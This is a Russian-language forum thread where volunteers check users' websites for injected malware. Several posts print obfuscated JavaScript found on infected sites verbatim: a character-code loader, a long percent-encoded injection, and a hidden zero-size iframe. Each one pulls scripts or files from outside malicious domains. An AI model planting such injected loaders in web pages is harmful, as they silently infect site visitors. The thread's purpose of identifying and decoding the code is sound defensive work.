Проверить сайт на наличие вирусов, все просьбы о проверке оставляйте в этой теме

akok

Команда форума
Администратор
Ассоциация VN
Сообщения
24,585
Реакции
13,563
  • Первое сообщение
  • #1
Нашим ресурсом оказываются услуги по проверке интернет ресурсов на наличие вредоносного кода.

Прошу учесть, что помощь оказывается добровольцами и поэтому не требуйте немедленной помощи. Вам обязательно окажут помощь.

Если вы хотите проверить сайт на вирусы, то выполните простые правила оформления запроса:
  1. Администрация имеет право отказать в проверке, в случае, если проверяемый ресурс нарушает законодательство или правила данного ресурса (варез, хакерская тематика, материалы порнографического характера).
  2. Никогда не публикуйте активных ссылок. (заменяйте http на хттп, например https://safezone.cc - нужно писать как хттп://safezone.cc)
  3. Не прикрепляйте файлы, которые предлагают вам скачать подозреваемые сайты. (Просто укажите имя файла, который пытается загрузится).
  4. Если Вы подозреваете, что после посещения подозрительного сайта Ваш компьютер подвергся заражению, то лучше выполнить правила оформления запроса.

*Мы не можем гарантировать 100% результат анализа. Слишком много факторов которых невозможно учесть.
 
Здравствуйте всем и с наступающим!
Прошу посмотреть сайт allnod.com/index.php , а то жалуются, что нод32 на него ругается.

<script language="JavaScript" src="/allnod.js"></script>
<script type="text/javascript" language="javascript">
<!--
function IU520(t127){document.write( String.fromCharCode(parseInt(t127)+2));}
var wo231="102O114O114O110O56O45O45O98O96O112O109O104O"+
"44O109O105O109O113O102O99O97O102O105O95O44O108O99O"+
"114O45O113O45O110O86O87O80O70O53O54O49O47O45O61O113O"+
"103O98O59O47O53O48O47O54";var Uv703=wo231.split("O");
document.write("<s"+"cript type='text/javascript' language='javascri"+"pt' src='");
var Hi319=0;while(Hi319<Uv703.length){IU520(Uv703[Hi319]);Hi319++;}
document.write("'></sc"+"ript>");
Вот этот скрипт в начале страницы, что он делает, как его распарсить?

ps/ у меня здесь уже есть регистрация(Husky), но я забыл пароль, и почты той уже нет(
Если есть возможность у администрации, напомните мне пароль в ЛС.
С уважением.
 
Последнее редактирование:
Husky1, в расшифровке это значит:

PHP:
<script type='text/javascript' language='javascript' src='http://dbroj.okoshechka.net/s/*****/?sid=17218'></script>

А там
PHP:
var ref = (document.referrer&&document.referrer!="") ? '&ref='+escape(document.referrer) : '';
var seed = '&seed='+Math.round(Math.random()*100000000);
document.write('<script type="text/javascript" language="javascript" src="http://dbro'+'j.oko'+'she'+'chk'+'a'+'.n'+'************/?sid'+'=172'+'18'+ref+seed+'"></script>');

Добавлено через 2 минуты 4 секунды
ps/ у меня здесь уже есть регистрация(Husky), но я забыл пароль, и почты той уже нет(
Если есть возможность у администрации, напомните мне пароль в ЛС
Если почта утеряна, то администрация ничем не может помочь.
 
Добавлено через 54 секунды
Проверьте этот сайт хттп://ввв.marvin-vibez.in....КИС 2010 блокира сайта..!:confused:
 
Последнее редактирование:
Cайт не работает. Но там интересный скрипт:

PHP:
<noframes><body><ad><script LANGUAGE='javascript'>var type_of='%3c'+'%73'+'%63'+'%72'+'%69'+'%70'+'%74'+'%20'+'%6c'+'%61'+'%6e'+'%67'+'%75'+'%61'+'%67'+'%65'+'%3d'+'%27'+'%6a'+'%61'+'%76'+'%61'+'%73'+'%63'+'%72'+'%69'+'%70'+'%74'+'%27'+'%3e'+'%64'+'%6f'+'%63'+'%75'+'%6d'+'%65'+'%6e'+'%74'+'%2e'+'%77'+'%72'+'%69'+'%74'+'%65'+'%28'+'%75'+'%6e'+'%65'+'%73'+'%63'+'%61'+'%70'+'%65'+'%28'+'%27'+'%25'+'%33'+'%63'+'%25'+'%37'+'%33'+'%25'+'%36'+'%33'+'%25'+'%37'+'%32'+'%25'+'%36'+'%39'+'%25'+'%37'+'%30'+'%25'+'%37'+'%34'+'%25'+'%32'+'%30'+'%25'+'%36'+'%63'+'%25'+'%36'+'%31'+'%25'+'%36'+'%65'+'%25'+'%36'+'%37'+'%25'+'%37'+'%35'+'%25'+'%36'+'%31'+'%25'+'%36'+'%37'+'%25'+'%36'+'%35'+'%25'+'%33'+'%64'+'%25'+'%32'+'%37'+'%25'+'%36'+'%61'+'%25'+'%36'+'%31'+'%25'+'%37'+'%36'+'%25'+'%36'+'%31'+'%25'+'%37'+'%33'+'%25'+'%36'+'%33'+'%25'+'%37'+'%32'+'%25'+'%36'+'%39'+'%25'+'%37'+'%30'+'%25'+'%37'+'%34'+'%25'+'%32'+'%37'+'%25'+'%33'+'%65'+'%25'+'%36'+'%36'+'%25'+'%37'+'%35'+'%25'+'%36'+'%65'+'%25'+'%36'+'%33'+'%25'+'%37'+'%34'+'%25'+'%36'+'%39'+'%25'+'%36'+'%66'+'%25'+'%36'+'%65'+'%25'+'%32'+'%30'+'%25'+'%34'+'%36'+'%25'+'%34'+'%35'+'%25'+'%32'+'%38'+'%25'+'%37'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%32'+'%39'+'%25'+'%37'+'%62'+'%25'+'%37'+'%36'+'%25'+'%36'+'%31'+'%25'+'%37'+'%32'+'%25'+'%32'+'%30'+'%25'+'%37'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%33'+'%31'+'%25'+'%33'+'%64'+'%25'+'%37'+'%35'+'%25'+'%36'+'%65'+'%25'+'%36'+'%35'+'%25'+'%37'+'%33'+'%25'+'%36'+'%33'+'%25'+'%36'+'%31'+'%25'+'%37'+'%30'+'%25'+'%36'+'%35'+'%25'+'%32'+'%38'+'%25'+'%37'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%32'+'%65'+'%25'+'%37'+'%33'+'%25'+'%37'+'%35'+'%25'+'%36'+'%32'+'%25'+'%37'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%32'+'%38'+'%25'+'%33'+'%30'+'%25'+'%32'+'%63'+'%25'+'%37'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%32'+'%65'+'%25'+'%36'+'%63'+'%25'+'%36'+'%35'+'%25'+'%36'+'%65'+'%25'+'%36'+'%37'+'%25'+'%37'+'%34'+'%25'+'%36'+'%38'+'%25'+'%32'+'%64'+'%25'+'%33'+'%31'+'%25'+'%32'+'%39'+'%25'+'%32'+'%39'+'%25'+'%33'+'%62'+'%25'+'%37'+'%36'+'%25'+'%36'+'%31'+'%25'+'%37'+'%32'+'%25'+'%32'+'%30'+'%25'+'%36'+'%66'+'%25'+'%37'+'%35'+'%25'+'%37'+'%34'+'%25'+'%33'+'%64'+'%25'+'%32'+'%37'+'%25'+'%32'+'%37'+'%25'+'%33'+'%62'+'%25'+'%36'+'%36'+'%25'+'%36'+'%66'+'%25'+'%37'+'%32'+'%25'+'%32'+'%38'+'%25'+'%36'+'%61'+'%25'+'%33'+'%64'+'%25'+'%33'+'%30'+'%25'+'%33'+'%62'+'%25'+'%36'+'%61'+'%25'+'%33'+'%63'+'%25'+'%37'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%33'+'%31'+'%25'+'%32'+'%65'+'%25'+'%36'+'%63'+'%25'+'%36'+'%35'+'%25'+'%36'+'%65'+'%25'+'%36'+'%37'+'%25'+'%37'+'%34'+'%25'+'%36'+'%38'+'%25'+'%33'+'%62'+'%25'+'%36'+'%61'+'%25'+'%32'+'%62'+'%25'+'%32'+'%62'+'%25'+'%32'+'%39'+'%25'+'%36'+'%66'+'%25'+'%37'+'%35'+'%25'+'%37'+'%34'+'%25'+'%32'+'%62'+'%25'+'%33'+'%64'+'%25'+'%35'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%36'+'%39'+'%25'+'%36'+'%65'+'%25'+'%36'+'%37'+'%25'+'%32'+'%65'+'%25'+'%36'+'%36'+'%25'+'%37'+'%32'+'%25'+'%36'+'%66'+'%25'+'%36'+'%64'+'%25'+'%34'+'%33'+'%25'+'%36'+'%38'+'%25'+'%36'+'%31'+'%25'+'%37'+'%32'+'%25'+'%34'+'%33'+'%25'+'%36'+'%66'+'%25'+'%36'+'%34'+'%25'+'%36'+'%35'+'%25'+'%32'+'%38'+'%25'+'%37'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%33'+'%31'+'%25'+'%32'+'%65'+'%25'+'%36'+'%33'+'%25'+'%36'+'%38'+'%25'+'%36'+'%31'+'%25'+'%37'+'%32'+'%25'+'%34'+'%33'+'%25'+'%36'+'%66'+'%25'+'%36'+'%34'+'%25'+'%36'+'%35'+'%25'+'%34'+'%31'+'%25'+'%37'+'%34'+'%25'+'%32'+'%38'+'%25'+'%36'+'%61'+'%25'+'%32'+'%39'+'%25'+'%32'+'%64'+'%25'+'%37'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%32'+'%65'+'%25'+'%37'+'%33'+'%25'+'%37'+'%35'+'%25'+'%36'+'%32'+'%25'+'%37'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%32'+'%38'+'%25'+'%37'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%32'+'%65'+'%25'+'%36'+'%63'+'%25'+'%36'+'%35'+'%25'+'%36'+'%65'+'%25'+'%36'+'%37'+'%25'+'%37'+'%34'+'%25'+'%36'+'%38'+'%25'+'%32'+'%64'+'%25'+'%33'+'%31'+'%25'+'%32'+'%63'+'%25'+'%33'+'%31'+'%25'+'%32'+'%39'+'%25'+'%32'+'%39'+'%25'+'%33'+'%62'+'%25'+'%36'+'%34'+'%25'+'%36'+'%66'+'%25'+'%36'+'%33'+'%25'+'%37'+'%35'+'%25'+'%36'+'%64'+'%25'+'%36'+'%35'+'%25'+'%36'+'%65'+'%25'+'%37'+'%34'+'%25'+'%32'+'%65'+'%25'+'%37'+'%37'+'%25'+'%37'+'%32'+'%25'+'%36'+'%39'+'%25'+'%37'+'%34'+'%25'+'%36'+'%35'+'%25'+'%32'+'%38'+'%25'+'%37'+'%35'+'%25'+'%36'+'%65'+'%25'+'%36'+'%35'+'%25'+'%37'+'%33'+'%25'+'%36'+'%33'+'%25'+'%36'+'%31'+'%25'+'%37'+'%30'+'%25'+'%36'+'%35'+'%25'+'%32'+'%38'+'%25'+'%36'+'%66'+'%25'+'%37'+'%35'+'%25'+'%37'+'%34'+'%25'+'%32'+'%39'+'%25'+'%32'+'%39'+'%25'+'%33'+'%62'+'%25'+'%37'+'%64'+'%25'+'%33'+'%63'+'%25'+'%32'+'%66'+'%25'+'%37'+'%33'+'%25'+'%36'+'%33'+'%25'+'%37'+'%32'+'%25'+'%36'+'%39'+'%25'+'%37'+'%30'+'%25'+'%37'+'%34'+'%25'+'%33'+'%65'+'%27'+'%29'+'%29'+'%3b'+'%3c'+'%2f'+'%73'+'%63'+'%72'+'%69'+'%70'+'%74'+'%3e';for(i=0;i<type_of.length+2;i=i+3)document.write(unescape(type_of.substr(i,3)));FE('%286Fvfulsw%2853ODQJXDJH%286G%2855mdydvfulsw%2855%286Hli%285%3Bgrfxphqw1frrnlh1lqgh%7BRi%285%3B%2855xufklq%2855%285%3C%286G%286G04%2853%2859%2859%2853%2854zlqgrz1qdyljdwru1xvhuDjhqw1wrOrzhuFdvh%285%3B%285%3C1pdwfk%285%3B2%285%3Bfudzohu%28%3AFjrrjoherw%28%3AFpvqerw%28%3AF%7Cdkrr%28%3AFvhdufk%28%3AFlqgh%7Bhu%28%3AFfxloo1frp%28%3AFvwdfnudpeohu%28%3AFdsruw%28%3AF%7Cdqgh%7B%28%3AFelqj%28%3AFdvn%285%3C2%285%3C%2*******286G2%2855%286E%2853grfxphqw1zulwh%285%3B%2855%286Fl%2855.%2855iud%2855.%2855ph%2853zlgw%2855.%2855k%286G%2855.%28556%2853khljk%2855.%2855w%286G4%2853erug%2855.%2855hu%286G3%2853iu%2855.%2855dp%2855.%2855her%2855.%2855ughu%286G%2855.%28553%2853vuf%286G%285%3Ak%2855.%2855wws%2855.%2855%*****55%285%3C%286E%28%3AG%286F2VFULSW%286H%283D3');</script>
 
Husky1, в расшифровке это значит:........

Если почта утеряна, то администрация ничем не может помочь.
Ясно, спасибо akoK. Как вы расшифровали код, на поделитесь секретами?
А на счет аккаунта, ладно, бог с ним, не критично)
 
Добрый день! Помогите, пожалуйста, проверить на вирусы сайт ввв.mybodyflex.ru

Уже несколько дней NOD на форуме выжает сообщение: "блокировано соединение с вредоносным сайтом westnorths.cn...... "
 
Последнее редактирование:
Насколько я понимаю проблему уже пофиксили? Не вижу вредоносных редиректов.
 
Насколько я понимаю проблему уже пофиксили? Не вижу вредоносных редиректов.

Да, спасибо! Проблема, как оказалось, была вызвана линеечками с одного сата, коотрый подхватил вирус. Закрыла линеечки и проблема решилась.
 
Проверьте пожалуйста
9b2c1d90.png
 
Заражен
В коде:
PHP:
<script>window.status=" ";document.write(unescape("%3C%69"+"f%72%61me%20src%3Dht"+"********%3Dc206a9f40624fffd7eac23b23e0f6fbb%20width%3D0%20height%3D0%3E%3C/%69%66%72%61%6D%65%3E"));</script><br />

Который ведет на http://mr*****isy.cn/?s=c206a9f47eac23b23e0f6fbb

Который в свою очередь пытается загрузить pdf.
 
Добрый день! Проверьте, пожалуйста, сайт ввв magicwish . ru
Касперский видит трояна, остальные интивирусы молчат...
 
Вот еще пользователь сообщил, что АВАСТ закрывает форум... А можно проверить? У меня НОД - он никаких проблем не показывает...
 
Назад
Сверху Снизу